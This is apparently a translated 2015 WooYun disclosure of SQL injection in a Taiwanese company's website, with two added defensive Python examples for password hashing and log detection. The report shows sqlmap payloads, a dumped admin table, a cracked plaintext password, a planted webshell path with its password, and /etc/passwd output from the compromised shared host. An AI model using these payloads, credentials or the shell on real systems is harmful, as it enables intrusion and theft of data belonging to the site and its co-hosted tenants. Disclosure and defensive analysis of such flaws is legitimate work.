
Vulnerability summary

Defect ID: wooyun-2015-0161815

Title: 友誌金屬股份有限公司 SQL injection (4 injection points bundled + admin password decrypted and backend accessed + getshell obtained, can affect the intranet) (Taiwan region)

Vendor: 友誌金屬股份有限公司

Author: 路人甲

Submitted: 2015-12-16 15:10

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner (Hitcon Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-16: Details sent to the vendor, awaiting vendor handling
2015-12-18: Vendor confirmed; details visible to the vendor only
2015-12-28: Details opened to core white hats and relevant domain experts
2016-01-07: Details opened to regular white hats
2016-01-17: Details opened to intern white hats
2016-02-01: Details opened to the public

Summary:

友誌金屬股份有限公司 SQL injection (4 injection points bundled + admin password decrypted and backend accessed + getshell obtained, can affect the intranet)

Details:

Damn, one moment of carelessness and someone else submitted one; this one shouldn't be a duplicate, right?
I'll just bundle them all for you.
===============================================
Injection point 1:
The content search on the homepage has a POST injection.
POST request:

POST /products.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/products.php
Cookie: PHPSESSID=8da82j1qq7oq4mlqcma9ssk4t6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

Actions=&keyword=1%27&button4.x=32&button4.y=16


[screenshot: 4D_@1LR%_BYL@RG{6OQ3EBB.png]


Injection point 2:

http://**.**.**.**/products.php?cid=10


cid is injectable
Data:

Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=10' AND 5723=5723 AND 'ksot'='ksot
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cid=10' AND (SELECT 3326 FROM(SELECT COUNT(*),CONCAT(0x
SELECT (CASE WHEN (3326=3326) THEN 1 ELSE 0 END)),0x3a6e79623a,FLOOR
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BgvB'='B
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=10' AND SLEEP(5) AND 'bBYY'='bBYY
---
[14:13:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[14:13:43] [INFO] fetching current user
[14:13:43] [INFO] retrieved: yozu@%
current user: 'yozu@%'


Injection point 3:

http://**.**.**.**/products.php?page=&keyword=&cid=10&pid=408


pid is injectable

current user:    'yozu@%'


Injection point 4:
http://**.**.**.**/modules_page.php?class=1&num=3
class and num are both injectable

current user:    'yozu@%'


available databases [2]:
[*] information_schema
[*] yozu


Database: yozu
[12 tables]
+---------------------------------------+
| contacts |
| counter |
| items |
| menu_item_1 |
| menu_item_2 |
| news |
| news_category |
| product |
| product_category |
| quick_links |
| suites |
| sysuser |
+---------------------------------------+


System administrators:

Table: sysuser
[2 entries]
+--------+-----------+-----------------+-------------+----------------------------------+
| status | sysUserId | sysUserIdNameCH | sysUserName | sysUserPass                      |
+--------+-----------+-----------------+-------------+----------------------------------+
| 1      | 1         | ????????????    | admin       | f6ef546ef96e7fe9217047b4cd31703e |
| 1      | 11        | NULL            | yozu        | b0390b11f782dc73c3b92d624ab821b1 |
+--------+-----------+-----------------+-------------+----------------------------------+


Looked the hash up on cmd5:
yozu
aol0xh08
Backend login URL:

http://**.**.**.**/admin/login.php


[screenshot: 8NE~S5J%[WCW83%8K@@04P5.png]
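The sysuser rows above hold unsalted 32-character MD5 hashes, which is why an online lookup service recovered the password. The block below is an added example (not the site's or the report's code) showing what the table should hold instead and how to get existing rows there: a salted, iterated PBKDF2 hash, a verifier that still accepts the legacy format, and a login routine that rehashes a legacy row on the first successful login (migration needs the plaintext, so it can only happen then). The usernames, passwords and hashes in it are constructed for the example; the iteration count is an assumption to tune to the server.

```python
"""Password-storage example for an admin table like sysuser above. Added for
this page, not the site's code: the rows, usernames and passwords below are
constructed, not the report's."""
import hashlib
import hmac
import os
import re

# Unsalted 32-hex MD5, the format the dumped sysuser rows were in.
LEGACY_MD5 = re.compile(r"[0-9a-f]{32}")
# PBKDF2-HMAC-SHA256 work factor (assumption: current OWASP figure; tune to hardware).
ITERATIONS = 600_000


def is_legacy_hash(stored: str) -> bool:
    return LEGACY_MD5.fullmatch(stored) is not None


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, iterated hash in a self-describing format: algo$iters$salt$dk."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check against either format; malformed rows never verify."""
    if is_legacy_hash(stored):
        candidate = hashlib.md5(password.encode()).hexdigest()
        return hmac.compare_digest(candidate, stored)
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk, bytes.fromhex(dk_hex))
    except ValueError:
        return False


def login(users: dict, username: str, password: str) -> bool:
    """Check a login; on the first success against a legacy row, rehash it in place.
    Migration needs the plaintext, so it can only happen at login time."""
    stored = users.get(username)
    if stored is None or not verify_password(password, stored):
        return False
    if is_legacy_hash(stored):
        users[username] = hash_password(password)
    return True


def legacy_rows(users: dict) -> list:
    """Audit helper: which accounts are still on unsalted MD5."""
    return sorted(u for u, h in users.items() if is_legacy_hash(h))


# Constructed rows in sysuser shape (username -> sysUserPass). Example credentials only.
USERS = {
    "admin": hashlib.md5(b"example-only-pw").hexdigest(),  # legacy, not yet migrated
    "yozu": hash_password("another-example-pw"),          # already on PBKDF2
}

if __name__ == "__main__":
    users = dict(USERS)
    print("legacy rows before:", legacy_rows(users))
    print("admin login:", login(users, "admin", "example-only-pw"))
    print("legacy rows after:", legacy_rows(users))
```

legacy_rows() is the audit query to run against the real table; any account it still lists after a migration window should have its password reset rather than be left on MD5 indefinitely.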


Getshell via the background upload
One-line webshell: http://**.**.**.**/images/123dorr.php xiao

[screenshot: RTP4P@3N)HJQ`5UJ3E@UHGW.png]


[screenshot: 0[8~OWT~WTW6{8ST}PHJZQI.png]
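From the defender's side, every step of this report except the first injection point leaves a trace in the web server's access log: the boolean, time-based and error-based probes at injection points 2 to 4 arrive in the query string, and the webshell lives under /images/, a directory that should never serve PHP. The block below is an added example (not the report's or the site's code) that scans Apache combined-format log lines for those shapes and summarises hits per source address. The log lines are constructed to mirror the payload shapes shown above, with RFC 5737 test addresses, and are not the report's evidence; the signature patterns generalise the specific payloads shown to their usual forms.

```python
"""Detection example for the findings above: scan Apache access-log lines for
the SQL-injection probe shapes seen at injection points 2-4 and for requests to
PHP files under the image upload directory. Added for this page; not the
report's or the site's code."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (RFC 5737 test addresses). They mirror the
# payload shapes shown in the report but are not the report's own evidence.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Dec/2015:14:13:43 +0800] "GET /products.php?cid=10%27%20AND%205723%3D5723%20AND%20%27ksot%27%3D%27ksot HTTP/1.1" 200 5120
203.0.113.7 - - [16/Dec/2015:14:13:44 +0800] "GET /products.php?cid=10%27%20AND%20SLEEP(5)%20AND%20%27bBYY%27%3D%27bBYY HTTP/1.1" 200 5120
203.0.113.7 - - [16/Dec/2015:14:13:45 +0800] "GET /products.php?cid=10%27%20AND%20(SELECT%203326%20FROM(SELECT%20COUNT(*),CONCAT(0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27BgvB%27%3D%27BgvB HTTP/1.1" 500 812
198.51.100.2 - - [16/Dec/2015:14:20:01 +0800] "GET /products.php?cid=10 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Dec/2015:14:31:09 +0800] "POST /images/123dorr.php HTTP/1.1" 200 143
198.51.100.2 - - [16/Dec/2015:14:32:00 +0800] "GET /images/logo.png HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# (tag, which part of the decoded request it applies to, pattern)
SIGNATURES = [
    # quote, then AND/OR n=n: the boolean-based probe
    ("sqli-boolean", "query", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    # SLEEP(n): the time-based probe
    ("sqli-time", "query", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    # CONCAT(...FLOOR(RAND(...: the MySQL duplicate-key error-based probe
    ("sqli-error", "query", re.compile(r"\bconcat\s*\(.*\bfloor\s*\(\s*rand\s*\(", re.I | re.S)),
    ("sqli-error", "query", re.compile(r"\binformation_schema\b", re.I)),
    # An upload directory should never serve PHP; any hit on /images/*.php is suspect.
    ("webshell-path", "path", re.compile(r"^/images/[^/]+\.php$", re.I)),
]


def classify_request(raw_target: str) -> list:
    """URL-decode one request target and return its sorted, de-duplicated tags."""
    decoded = unquote_plus(raw_target)
    path, _, query = decoded.partition("?")
    parts = {"path": path, "query": query}
    return sorted({tag for tag, part, pat in SIGNATURES if pat.search(parts[part])})


def scan_log(text: str) -> list:
    """Return one finding per flagged line, in log order; unparseable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "status": m["status"], "path": unquote_plus(m["path"]),
                             "tags": tags})
    return findings


def summarize(findings: list) -> dict:
    """Source address -> sorted list of every tag seen from it."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["tags"])
    return {ip: sorted(tags) for ip, tags in by_ip.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["method"], h["status"], h["path"], ",".join(h["tags"]))
    print(summarize(hits))
```

Two caveats a practitioner will hit. Injection point 1 sends its payload in the POST body, which the standard access log does not record, so catching it needs application-level request logging or a WAF in front of products.php. And the webshell rule is a policy check rather than a signature: it only works because PHP has no business executing from /images/, which is also the configuration fix (deny script execution in upload directories), independent of whatever file name the attacker chose.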


Can reach the intranet:

[/var/www/vhosts/**.**.**.**/httpdocs/images/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:99:0B:1E
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe99:b1e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:289623235 errors:0 dropped:0 overruns:0 frame:0
TX packets:355824926 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:42333090224 (39.4 GiB) TX bytes:450134502913 (419.2 GiB)
eth0:0 Link encap:Ethernet HWaddr 00:50:56:99:0B:1E
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:21919526 errors:0 dropped:0 overruns:0 frame:0
TX packets:21919526 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:31139837549 (29.0 GiB) TX bytes:31139837549 (29.0 GiB)


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sw-cp-server:x:500:500::/:/bin/true
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
psaadm:x:501:501:psa user:/usr/local/psa/admin:/sbin/nologin
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin
mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin
psaftp:x:502:503:anonftp psa user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
steve:x:10075:10075::/home/steve:/bin/bash
clamav:x:498:499:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
horde_sysuser:x:497:10076:horde webmail user:/usr/share/psa-horde:/sbin/nologin
artbicycle:x:10076:505::/var/www/vhosts/**.**.**.**:/bin/false
beikin:x:10077:505::/var/www/vhosts/**.**.**.**:/bin/false
biotop:x:10078:505::/var/www/vhosts/**.**.**.**:/bin/false
bossdo:x:10079:505::/var/www/vhosts/**.**.**.**:/bin/false
cf-faucet:x:10080:505::/var/www/vhosts/**.**.**.**:/bin/false
changmei:x:10081:505::/var/www/vhosts/**.**.**.**:/bin/false
chdcc:x:10082:505::/var/www/vhosts/**.**.**.**:/bin/false
chelchem:x:10083:505::/var/www/vhosts/**.**.**.**:/bin/false
chen-hao:x:10084:505::/var/www/vhosts/**.**.**.**:/bin/false
cheng-kai:x:10085:505::/var/www/vhosts/**.**.**.**:/bin/false
chichia_online:x:10086:505::/var/www/vhosts/**.**.**.**:/bin/false
chinan:x:10087:505::/var/www/vhosts/**.**.**.**:/bin/false
chinghair:x:10088:505::/var/www/vhosts/**.**.**.**:/bin/false
chunli:x:10089:505::/var/www/vhosts/**.**.**.**:/bin/false
cs-plywood:x:10090:505::/var/www/vhosts/**.**.**.**:/bin/false
csic-tw:x:10091:505::/var/www/vhosts/**.**.**.**:/bin/false
dsrotocasting:x:10093:505::/var/www/vhosts/**.**.**.**:/bin/false
ertc:x:10094:505::/var/www/vhosts/**.**.**.**:/bin/false
esch:x:10095:505::/var/www/vhosts/**.**.**.**:/bin/false
dysample:x:10096:505::/var/www/vhosts/**.**.**.**:/bin/false
demo:x:10096:505::/var/www/vhosts/**.**.**.**/subdomains/demo:/bin/false
falali:x:10097:505::/var/www/vhosts/**.**.**.**:/bin/false
famego:x:10098:505::/var/www/vhosts/**.**.**.**:/bin/false
fastace:x:10099:505::/var/www/vhosts/**.**.**.**:/bin/false
fugeng:x:10100:505::/var/www/vhosts/**.**.**.**:/bin/false
gacity-tw:x:10101:505::/var/www/vhosts/**.**.**.**:/bin/false
gddg-china:x:10102:505::/var/www/vhosts/**.**.**.**:/bin/false
guggenheim:x:10103:505::/var/www/vhosts/**.**.**.**:/bin/false
heryei:x:10104:505::/var/www/vhosts/**.**.**.**:/bin/false
hexatool:x:10105:505::/var/www/vhosts/**.**.**.**:/bin/false
homing:x:10106:505::/var/www/vhosts/**.**.**.**:/bin/false
honiton:x:10107:505::/var/www/vhosts/**.**.**.**:/bin/false
hornse:x:10108:505::/var/www/vhosts/**.**.**.**:/bin/false
hunkun:x:10109:505::/var/www/vhosts/**.**.**.**:/bin/false
hwayi-foods:x:10110:505::/var/www/vhosts/**.**.**.**:/bin/false
ih-tools:x:10111:505::/var/www/vhosts/**.**.**.**:/bin/false
j-yang:x:10112:505::/var/www/vhosts/**.**.**.**:/bin/false
jeasheng:x:10113:505::/var/www/vhosts/**.**.**.**:/bin/false
jeoulian:x:10114:505::/var/www/vhosts/**.**.**.**:/bin/false
jhn:x:10115:505::/var/www/vhosts/**.**.**.**:/bin/false
jia-zhen:x:10116:505::/var/www/vhosts/**.**.**.**:/bin/false
jincian:x:10117:505::/var/www/vhosts/**.**.**.**:/bin/false
js-glass:x:10118:505::/var/www/vhosts/**.**.**.**:/bin/false
keyo:x:10119:505::/var/www/vhosts/**.**.**.**:/bin/false
kuen-fuh:x:10120:505::/var/www/vhosts/**.**.**.**:/bin/false
linnfa:x:10121:505::/var/www/vhosts/**.**.**.**:/bin/false
administrator:x:10122:505::/var/www/vhosts/localhost.localdomain:/bin/false
loyu:x:10123:505::/var/www/vhosts/**.**.**.**:/bin/false
manice:x:10124:505::/var/www/vhosts/**.**.**.**:/bin/false
mitsusuzu:x:10125:505::/var/www/vhosts/**.**.**.**:/bin/false
probar:x:10126:505::/var/www/vhosts/**.**.**.**:/bin/false
rollerking:x:10127:505::/var/www/vhosts/**.**.**.**:/bin/false
sdrock:x:10128:505::/var/www/vhosts/**.**.**.**:/bin/false
sensewin:x:10129:505::/var/www/vhosts/**.**.**.**:/bin/false
**.**.**.**:x:10130:505::/var/www/vhosts/**.**.**.**:/bin/false
sharpgun:x:10131:505::/var/www/vhosts/**.**.**.**.tw:/bin/false
sk-ht:x:10132:505::/var/www/vhosts/**.**.**.**:/bin/false
softjaws:x:10133:505::/var/www/vhosts/**.**.**.**:/bin/false
stork:x:10134:505::/var/www/vhosts/**.**.**.**:/bin/false
stu:x:10135:505::/var/www/vhosts/**.**.**.**:/bin/false
sunhang:x:10136:505::/var/www/vhosts/**.**.**.**:/bin/false
wys:x:10137:505::/var/www/vhosts/**.**.**.**:/bin/false
tanjun:x:10138:505::/var/www/vhosts/**.**.**.**:/bin/false
tdf:x:10139:505::/var/www/vhosts/**.**.**.**:/bin/false
tolian:x:10140:505::/var/www/vhosts/**.**.**.**:/bin/false
tripod:x:10141:505::/var/www/vhosts/**.**.**.**:/bin/false
tumak2:x:10142:505::/var/www/vhosts/**.**.**.**:/bin/false
tyalco:x:10143:505::/var/www/vhosts/**.**.**.**:/bin/false
use168:x:10144:505::/var/www/vhosts/**.**.**.**:/bin/false
veneer-art:x:10145:505::/var/www/vhosts/**.**.**.**:/bin/false
weimin_online:x:10146:505::/var/www/vhosts/**.**.**.**:/bin/false
winart:x:10147:505::/var/www/vhosts/**.**.**.**:/bin/false
xinhe:x:10148:505::/var/www/vhosts/**.**.**.**:/bin/false
yealeng:x:10149:505::/var/www/vhosts/**.**.**.**:/bin/false
yee-mingying:x:10150:505::/var/www/vhosts/**.**.**.**:/bin/false
yozu:x:10151:505::/var/www/vhosts/**.**.**.**:/bin/false
yu-hung:x:10152:505::/var/www/vhosts/**.**.**.**:/bin/false
vital:x:10153:505::/var/www/vhosts/**.**.**.**:/bin/false
freedoor:x:10154:505::/var/www/vhosts/**.**.**.**:/bin/false
honorpump:x:10155:505::/var/www/vhosts/**.**.**.**:/bin/false
sunny:x:10156:505::/var/www/vhosts/**.**.**.**:/bin/false
chen-fong:x:10157:505::/var/www/vhosts/**.**.**.**:/bin/false
lepack:x:10158:505::/var/www/vhosts/**.**.**.**:/bin/false
stspipe:x:10159:505::/var/www/vhosts/**.**.**.**:/bin/false
h5:x:10160:10160::/home/h5:/bin/bash
yi-lun:x:10161:505::/var/www/vhosts/**.**.**.**:/bin/false
versen:x:10162:505::/var/www/vhosts/**.**.**.**:/bin/false
jan-sheng:x:10163:505::/var/www/vhosts/**.**.**.**:/bin/false
yeong-luh:x:10164:505::/var/www/vhosts/**.**.**.**:/bin/false
jinyouli:x:10165:505::/var/www/vhosts/**.**.**.**:/bin/false
meng-nung:x:10166:505::/var/www/vhosts/**.**.**.**:/bin/false


Proof of vulnerability:

Fix recommendation:

Copyright: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-18 19:49

Vendor reply:

Thanks for the report.

Latest status:

None yet